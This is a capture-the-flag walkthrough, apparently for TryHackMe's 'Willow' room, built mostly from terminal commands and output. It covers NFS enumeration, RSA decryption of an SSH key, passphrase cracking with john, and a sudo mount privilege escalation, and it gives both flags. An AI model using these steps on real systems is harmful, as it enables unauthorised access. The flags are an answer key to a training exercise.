Willow

What lies under the Willow Tree?

Flags

Start Machine

Grab the flags from the Willow

Answer the questions below

User Flag:

https://muirlandoracle.co.uk/2020/01/29/rsa-encryption/

THM{beneath_the_weeping_willow_tree}

Root Flag:

Where, on a Linux system, would you first look for unmounted partitions?

THM{find_a_red_rose_on_the_grave}

[[VulnNet Endgame]]

PreviousSurfer NextConti

Last updated 1 year ago

┌──(witty㉿kali)-[~/Downloads] └─$ rustscan -a 10.10.140.120 --ulimit 5500 -b 65535 -- -A -Pn .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : https://discord.gg/GFrQsGy : : https://github.com/RustScan/RustScan : -------------------------------------- 🌍HACK THE PLANET🌍 [~] The config file is expected to be at "/home/witty/.rustscan.toml" [~] Automatically increasing ulimit value to 5500. [!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers Open 10.10.140.120:22 Open 10.10.140.120:80 Open 10.10.140.120:111 Open 10.10.140.120:2049 [~] Starting Script(s) [>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}") Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower. [~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-22 14:18 EDT NSE: Loaded 155 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 14:18 Completed NSE at 14:18, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 14:18 Completed NSE at 14:18, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 14:18 Completed NSE at 14:18, 0.00s elapsed Initiating Parallel DNS resolution of 1 host. at 14:18 Completed Parallel DNS resolution of 1 host. at 14:18, 0.01s elapsed DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0] Initiating Connect Scan at 14:18 Scanning 10.10.140.120 [4 ports] Discovered open port 80/tcp on 10.10.140.120 Discovered open port 111/tcp on 10.10.140.120 Discovered open port 22/tcp on 10.10.140.120 Discovered open port 2049/tcp on 10.10.140.120 Completed Connect Scan at 14:18, 0.19s elapsed (4 total ports) Initiating Service scan at 14:18 Scanning 4 services on 10.10.140.120 Completed Service scan at 14:18, 6.42s elapsed (4 services on 1 host) NSE: Script scanning 10.10.140.120. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 14:18 Completed NSE at 14:18, 5.89s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 14:18 Completed NSE at 14:18, 0.81s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 14:18 Completed NSE at 14:18, 0.00s elapsed Nmap scan report for 10.10.140.120 Host is up, received user-set (0.19s latency). Scanned at 2023-04-22 14:18:25 EDT for 14s PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack OpenSSH 6.7p1 Debian 5 (protocol 2.0) | ssh-hostkey: | 1024 43b087cde55409b1c11e7865d9785e1e (DSA) | ssh-dss AAAAB3NzaC1kc3MAAACBAJHkiuOeIrYxoyBBsJX2wpThJlvbsanlxpYXyHspzVIdeGQq3kD/2h1iNbOLwIb/iwS4oaY83OwxMiXImgKm/QgpgffrrKmU41eI/q9i+3NhLfHLvoT5PWupe/UW5Y3/lfmIMD1UXTUJNYiA07w/kHKj9ElQs7EZ2oZ9L5j2/h/lAAAAFQDE3pT3CTjQSOUOqdgu9HBaB6d6FwAAAIAFWqdfVx3v+GNxecTNp1mDb64WZcf2ssl/j+B6hj5W7s++DTY7Ls/i2R0z5bQes+5rMWYvanYFyWYEj31qWmrLvluJbJKldG3IttW5WfMzIyOJ11MHGAMP2/ZXZ4w3t8dMMudgBPkXE1uGv+p03A1i+Z6UfvGVv4HrtlCwqCRBywAAAIBpf+5ztR5aSDuZPxe/BURQIBKqDhOVZOt+Zhcc1GEcdukmlfmyH0sSm/3ae4CYLqBgD1zzwwSg4IkPR8wb1wa3G5F+OSYymEoKuxYWYN4LlSe9vrIap/1C/NO+jMQ5ru6WYqBcNdPqHQ4r5I7MzhziLdNIhfBmY076aL2Dr/OsAg== | 2048 c26591c838c9ccc7f9092061e554bdcf (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0/BxHjpZXU3EhwOMURG/xIJno/fZBBw2tntPhQMsA+L6YoVL4IyTKTz6SGM6BcX9622CGutBiO0pc0vhGlf9v/4cUB7My3d1r3t3EkNF0SaKAmAZLm8QOFbmS/TyHy9wF5TGJLunz5cN3NdGIz3Bz2GHHouicRo/vopYmHxjItfVgVUD2u+e5Gkw7u+U1BxZOrQDlaUS41AJvZm9Pk0pn2hWXeGTCJu8oyCqaEi/u8Wu7Ylp/t15NjEpiDpRp2LH9ctB3EG50LL+ti2o8/U652wIoNhnoF33eI6HJget9jvSC03oOx5r6NqHbOn94kVAUjFbYzK716dBa+I5jocHr | 256 bf3e4b3d78b67941f47d90635efb2a40 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIW2cLhyEIs7aEuL5e/SGCx5HsLX1a1GfgE/YBPGXiaFt/AkVFA3leapIvX+CD5wc7wCKGDToBgx6bkIY9vb0T0= | 256 2cc8874ad8f64cc3038d4c0922836664 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOsXsk2l13dc4bQlT0wYP6/4gpeoTx5IfVvOBF++ClPu 80/tcp open http syn-ack Apache httpd 2.4.10 ((Debian)) |_http-server-header: Apache/2.4.10 (Debian) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-title: Recovery Page 111/tcp open rpcbind syn-ack 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100003 2,3,4 2049/tcp nfs | 100003 2,3,4 2049/tcp6 nfs | 100003 2,3,4 2049/udp nfs | 100003 2,3,4 2049/udp6 nfs | 100005 1,2,3 33137/udp6 mountd | 100005 1,2,3 40449/tcp mountd | 100005 1,2,3 43406/udp mountd | 100005 1,2,3 52430/tcp6 mountd | 100021 1,3,4 36864/tcp6 nlockmgr | 100021 1,3,4 36897/tcp nlockmgr | 100021 1,3,4 37858/udp6 nlockmgr | 100021 1,3,4 48916/udp nlockmgr | 100024 1 34484/udp6 status | 100024 1 36227/tcp status | 100024 1 37362/udp status | 100024 1 56246/tcp6 status | 100227 2,3 2049/tcp nfs_acl | 100227 2,3 2049/tcp6 nfs_acl | 100227 2,3 2049/udp nfs_acl |_ 100227 2,3 2049/udp6 nfs_acl 2049/tcp open nfs_acl syn-ack 2-3 (RPC #100227) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel NSE: Script Post-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 14:18 Completed NSE at 14:18, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 14:18 Completed NSE at 14:18, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 14:18 Completed NSE at 14:18, 0.00s elapsed Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 17.58 seconds Hey Willow, here's your SSH Private key -- you know where the decryption key is! rpcbind is just used to map ports to services this will be how the NFS file server is running ┌──(witty㉿kali)-[~/Downloads] └─$ showmount -e 10.10.140.120 Export list for 10.10.140.120: /var/failsafe * ┌──(witty㉿kali)-[~/Downloads] └─$ sudo mkdir /mnt/willow-failsafe ┌──(witty㉿kali)-[~/Downloads] └─$ sudo mount 10.10.140.120:/var/failsafe /mnt/willow-failsafe ┌──(witty㉿kali)-[~/Downloads] └─$ ls -lah /mnt/willow-failsafe total 12K drwxr--r-- 2 nobody nogroup 4.0K Jan 30 2020 . drwxr-xr-x 3 root root 4.0K Apr 22 14:28 .. -rw-r--r-- 1 root root 62 Jan 30 2020 rsa_keys ┌──(witty㉿kali)-[/mnt/willow-failsafe] └─$ pwd /mnt/willow-failsafe ┌──(witty㉿kali)-[/mnt/willow-failsafe] └─$ ls rsa_keys ┌──(witty㉿kali)-[/mnt/willow-failsafe] └─$ cat rsa_keys Public Key Pair: (23, 37627) Private Key Pair: (61527, 37627) rsa_decrypt script (from muirlandoracle) ┌──(witty㉿kali)-[~/Downloads] └─$ cat rsa_decrypt.py import argparse parser = argparse.ArgumentParser(description="Decode RSA") parser.add_argument("file", help="The file containing the encrypted text") parser.add_argument("d", help="The Private Key", type=int) parser.add_argument("n", help="The Modulus", type=int) args=parser.parse_args() with open(args.file, "r") as coded: data = [int(i.strip("\n")) for i in coded.read().split(" ")] for i in data: print(chr(i**args.d % args.n), end="") ┌──(witty㉿kali)-[~/Downloads] └─$ more encoded.txt (from hex) 2367 2367 2367 2367 2367 9709 8600 28638 18410 1735 ┌──(witty㉿kali)-[~/Downloads] └─$ python3 rsa_decrypt.py encoded.txt 61527 37627 > rsakey ┌──(witty㉿kali)-[~/Downloads] └─$ cat rsakey -----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: AES-128-CBC,2E2F405A3529F92188B453CAA6E33270 qUVUQaJ+YmQRqto1knT5nW6m61mhTjJ1/ZBnk4H0O5jObgJoUtOQBU+hqSXzHvcX wLbqFh2kcSbF9SHn0sVnDQOQ1pox2NnGzt2qmmsjTffh8SGQBsGncDei3EABHcv1 gTtzGjHdn+HzvYxvA6J+TMT+akCxXb2+tfA+DObXVHzYKbGAsSNeLEE2CvVZ2X92 0HBZNEvGjsDEIQtc81d33CYjYM4rhJr0mihpCM/OGT3DSFTgZ2COW+H8TCgyhSOX SmbK1Upwbjg490TYvlMR+OQXjVJKydWFunPj9LbL/2Ut2DOgmdvboaluXq/xHYM7 q8+Ws506DXAXw3L5r9SToYWzaXiIqaVEO145BlMCSTHXMOb2HowSM/P2EHE727sJ JJ6ykTKOH+yY2Qit09Yt9Kc/FY/yp9LzgTMCtopGhK+1cmje8Ab5h7BMB7waMUiM YR891N+B3IIdkHPJSL6+WPtTXw5skposYpPGZSbBNMAw5VNVKyeRZJqfMJhP7iKP d8kExORkdC2DKu3KWkxhQv3tMpLyCUUhGZBJ/29+1At78jHzMfppf13YL13O/K7K Uhnf8sLAN51xZdefSDoEC3tGBebahh17VTLnu/21mjE76oONZ9fe/H7Y8Cp6BKh4 GknYUmh4DQ/cqGEFr+GHVNHxQ4kE1TSI/0r4WfekbHJr3+IHeTJVI52PWaCeHSLb bO/2bSbWENgSJ3joXxxumHr4DSvZqUInqZ9/5/jkkg+DrLsEHoHe3YyVh5QVm6ke 33yhlLOvOI6mSYYNNfQ/8U/1ee+2HjQXojvb57clLuOt6+ElQWnEcFEb74NxgQ+I DHEvVNHFGY+Z2jvCQoGb0LOV8cvVTSDXtbNQ5f/Z3bMdN3AhMN3tQmqXTAPuOI1T BXZ1aDS6x+s6ecKjybMV/dvnohG8+dDrssV4DPyTOLntpeBkqpSNeiM4MdhxTHj1 PCkDWfBXEAEA/hfvE1oWXMNguy3vlvKn8Sk9We5fl+tEBvPjPNSWrEHksq4ZJWSz JMEyWi/AxTnHDFiO+3m0Eovw41tdreBU2S6QbYsa9OOAiBnDmWn2m0YmAwS0636L NJ0Ay4L+ixfYZ+F/5oVQbhvDoXnQCO58mNYqqlDVtD/21aj1+RtoYxSX2f/jxCXt AMF890psZEugk+mhRZZ6HCvDewmBWkghrZeREEmuWAFkQWV/3gVdMpSdteWM7YIQ MxkyUMs4jmwvA4ktznTVN1kK7VAtkIUa8+UuVUfchKpQQjwpbGgfdMrcJe55tOdk M7mSP/jAl9bXlpyikMhrsdkVyNpFtmJU8EGJ4v5GlQzUDuySBCiwcZ7x6u3hpDG+ /+5Nf8423Dy/iAhSWAjoZD3BdkLnfbji1g4dNrJnqHnoZaZxvxs0qQEi/NcOEm4e W0pyDdA8so0zkTTd7gm6WFarM7ywGec5rX08gT5v3dDYbPA46LJVprtA+D3ymeR4 l3xMq6RDfzFIFa6MWS8yCK67p7mPxSfqvC5NDMONQ/fz+7fO3/pjKBYZYLuchpk4 TsH6aY4QbgnEMuA+Errb/uf/5MAhWDMqLBhi42kxaXZ1e3ZMz2penCZFf/nofbLc -----END RSA PRIVATE KEY----- or using this page :) https://www.cs.drexel.edu/~jpopyack/Courses/CSP/Fa17/notes/10.1_Cryptography/RSA_Express_EncryptDecrypt_v2.html Modulus: 37627 , decryption key: 37627 , ciphertext msg (from hex) ┌──(witty㉿kali)-[~/Downloads] └─$ nano willow_idrsa ┌──(witty㉿kali)-[~/Downloads] └─$ chmod 600 willow_idrsa ┌──(witty㉿kali)-[~/Downloads] └─$ cat willow_idrsa -----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: AES-128-CBC,2E2F405A3529F92188B453CAA6E33270 qUVUQaJ+YmQRqto1knT5nW6m61mhTjJ1/ZBnk4H0O5jObgJoUtOQBU+hqSXzHvcX wLbqFh2kcSbF9SHn0sVnDQOQ1pox2NnGzt2qmmsjTffh8SGQBsGncDei3EABHcv1 gTtzGjHdn+HzvYxvA6J+TMT+akCxXb2+tfA+DObXVHzYKbGAsSNeLEE2CvVZ2X92 0HBZNEvGjsDEIQtc81d33CYjYM4rhJr0mihpCM/OGT3DSFTgZ2COW+H8TCgyhSOX SmbK1Upwbjg490TYvlMR+OQXjVJKydWFunPj9LbL/2Ut2DOgmdvboaluXq/xHYM7 q8+Ws506DXAXw3L5r9SToYWzaXiIqaVEO145BlMCSTHXMOb2HowSM/P2EHE727sJ JJ6ykTKOH+yY2Qit09Yt9Kc/FY/yp9LzgTMCtopGhK+1cmje8Ab5h7BMB7waMUiM YR891N+B3IIdkHPJSL6+WPtTXw5skposYpPGZSbBNMAw5VNVKyeRZJqfMJhP7iKP d8kExORkdC2DKu3KWkxhQv3tMpLyCUUhGZBJ/29+1At78jHzMfppf13YL13O/K7K Uhnf8sLAN51xZdefSDoEC3tGBebahh17VTLnu/21mjE76oONZ9fe/H7Y8Cp6BKh4 GknYUmh4DQ/cqGEFr+GHVNHxQ4kE1TSI/0r4WfekbHJr3+IHeTJVI52PWaCeHSLb bO/2bSbWENgSJ3joXxxumHr4DSvZqUInqZ9/5/jkkg+DrLsEHoHe3YyVh5QVm6ke 33yhlLOvOI6mSYYNNfQ/8U/1ee+2HjQXojvb57clLuOt6+ElQWnEcFEb74NxgQ+I DHEvVNHFGY+Z2jvCQoGb0LOV8cvVTSDXtbNQ5f/Z3bMdN3AhMN3tQmqXTAPuOI1T BXZ1aDS6x+s6ecKjybMV/dvnohG8+dDrssV4DPyTOLntpeBkqpSNeiM4MdhxTHj1 PCkDWfBXEAEA/hfvE1oWXMNguy3vlvKn8Sk9We5fl+tEBvPjPNSWrEHksq4ZJWSz JMEyWi/AxTnHDFiO+3m0Eovw41tdreBU2S6QbYsa9OOAiBnDmWn2m0YmAwS0636L NJ0Ay4L+ixfYZ+F/5oVQbhvDoXnQCO58mNYqqlDVtD/21aj1+RtoYxSX2f/jxCXt AMF890psZEugk+mhRZZ6HCvDewmBWkghrZeREEmuWAFkQWV/3gVdMpSdteWM7YIQ MxkyUMs4jmwvA4ktznTVN1kK7VAtkIUa8+UuVUfchKpQQjwpbGgfdMrcJe55tOdk M7mSP/jAl9bXlpyikMhrsdkVyNpFtmJU8EGJ4v5GlQzUDuySBCiwcZ7x6u3hpDG+ /+5Nf8423Dy/iAhSWAjoZD3BdkLnfbji1g4dNrJnqHnoZaZxvxs0qQEi/NcOEm4e W0pyDdA8so0zkTTd7gm6WFarM7ywGec5rX08gT5v3dDYbPA46LJVprtA+D3ymeR4 l3xMq6RDfzFIFa6MWS8yCK67p7mPxSfqvC5NDMONQ/fz+7fO3/pjKBYZYLuchpk4 TsH6aY4QbgnEMuA+Errb/uf/5MAhWDMqLBhi42kxaXZ1e3ZMz2penCZFf/nofbLc -----END RSA PRIVATE KEY----- ──(witty㉿kali)-[~/Downloads] └─$ ssh -i willow_idrsa willow@10.10.140.120 The authenticity of host '10.10.140.120 (10.10.140.120)' can't be established. ED25519 key fingerprint is SHA256:magOpLj2XlET5C4pPvsDHoHa4Po1iJpM2eNFkXQUZ2I. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? ye Please type 'yes', 'no' or the fingerprint: yes Warning: Permanently added '10.10.140.120' (ED25519) to the list of known hosts. Enter passphrase for key 'willow_idrsa': using john ┌──(witty㉿kali)-[~/Downloads] └─$ ssh2john willow_idrsa > willow_hash.txt ┌──(witty㉿kali)-[~/Downloads] └─$ john --wordlist=/usr/share/wordlists/rockyou.txt willow_hash.txt Using default input encoding: UTF-8 Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes Cost 2 (iteration count) is 1 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status wildflower (willow_idrsa) 1g 0:00:00:00 DONE (2023-04-22 14:59) 16.66g/s 168533p/s 168533c/s 168533C/s chulita..simran Use the "--show" option to display all of the cracked passwords reliably Session completed. passphrase: wildflower ┌──(root㉿kali)-[/home/witty/Downloads] └─# ssh -i id_willow willow@10.10.140.120 Enter passphrase for key 'id_willow': sign_and_send_pubkey: no mutual signature supported willow@10.10.140.120's password: uhmm https://stackoverflow.com/questions/73795935/sign-and-send-pubkey-no-mutual-signature-supported ┌──(witty㉿kali)-[~/Downloads] └─$ ssh -o PubkeyAcceptedKeyTypes=ssh-rsa -i id_willow willow@10.10.140.120 Enter passphrase for key 'id_willow': "O take me in your arms, love For keen doth the wind blow O take me in your arms, love For bitter is my deep woe." -The Willow Tree, English Folksong willow@willow-tree:~$ ls Desktop Documents Downloads Music Pictures Public Templates user.jpg Videos ┌──(witty㉿kali)-[~/Downloads] └─$ scp -o PubkeyAcceptedKeyTypes=ssh-rsa -i id_willow willow@10.10.140.120:user.jpg . Enter passphrase for key 'id_willow': user.jpg 100% 12KB 21.4KB/s 00:00 ┌──(witty㉿kali)-[~/Downloads] └─$ eog user.jpg THM{beneath_the_weeping_willow_tree} willow@willow-tree:~$ sudo -l Matching Defaults entries for willow on willow-tree: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User willow may run the following commands on willow-tree: (ALL : ALL) NOPASSWD: /bin/mount /dev/* willow@willow-tree:~$ ls /dev autofs input rtc tty18 tty35 tty52 ttyS3 vcsa7 block kmsg rtc0 tty19 tty36 tty53 uhid vfio btrfs-control log shm tty2 tty37 tty54 uinput vga_arbiter char loop-control snapshot tty20 tty38 tty55 urandom vhci console mapper snd tty21 tty39 tty56 vcs vhost-net core mcelog stderr tty22 tty4 tty57 vcs1 vmci cpu mem stdin tty23 tty40 tty58 vcs2 xconsole cpu_dma_latency mqueue stdout tty24 tty41 tty59 vcs3 xen cuse net tty tty25 tty42 tty6 vcs4 xvda disk network_latency tty0 tty26 tty43 tty60 vcs5 xvda1 dri network_throughput tty1 tty27 tty44 tty61 vcs6 xvda2 fb0 null tty10 tty28 tty45 tty62 vcs7 xvda3 fd port tty11 tty29 tty46 tty63 vcsa xvdh full ppp tty12 tty3 tty47 tty7 vcsa1 zero fuse psaux tty13 tty30 tty48 tty8 vcsa2 hidden_backup ptmx tty14 tty31 tty49 tty9 vcsa3 hpet pts tty15 tty32 tty5 ttyS0 vcsa4 hugepages random tty16 tty33 tty50 ttyS1 vcsa5 initctl rfkill tty17 tty34 tty51 ttyS2 vcsa6 willow@willow-tree:~$ ls /mnt creds willow@willow-tree:~$ ls /mnt/creds/ willow@willow-tree:~$ sudo /bin/mount /dev/hidden_backup /mnt/creds willow@willow-tree:~$ cd /mnt/creds/ willow@willow-tree:/mnt/creds$ ls creds.txt willow@willow-tree:/mnt/creds$ cat creds.txt root:7QvbvBTvwPspUK willow:U0ZZJLGYhNAT2s willow@willow-tree:/mnt/creds$ su root Password: root@willow-tree:/mnt/creds# cd /root root@willow-tree:~# ls root.txt root@willow-tree:~# cat root.txt This would be too easy, don't you think? I actually gave you the root flag some time ago. You've got my password now -- go find your flag! (maybe stego) or willow@willow-tree:~$ cp /bin/bash /dev/shm/ willow@willow-tree:~$ cd /dev/shm willow@willow-tree:/dev/shm$ ls bash pulse-shm-2785350845 pulse-shm-90898252 pulse-shm-1194606719 pulse-shm-90638723 willow@willow-tree:/dev/shm$ sudo /bin/mount /dev/shm/bash /bin/mount -o force,bind willow@willow-tree:/dev/shm$ echo "bash" > /dev/shm/shell willow@willow-tree:/dev/shm$ ls bash pulse-shm-2785350845 pulse-shm-90898252 pulse-shm-1194606719 pulse-shm-90638723 shell willow@willow-tree:/dev/shm$ sudo /bin/mount /dev/shm/shell root@willow-tree:/dev/shm# id uid=0(root) gid=0(root) groups=0(root) but with this method cannot get creds.txt ┌──(witty㉿kali)-[~/Downloads] └─$ steghide extract -sf user.jpg Enter passphrase: 7QvbvBTvwPspUK wrote extracted data to "root.txt". ┌──(witty㉿kali)-[~/Downloads] └─$ cat root.txt THM{find_a_red_rose_on_the_grave}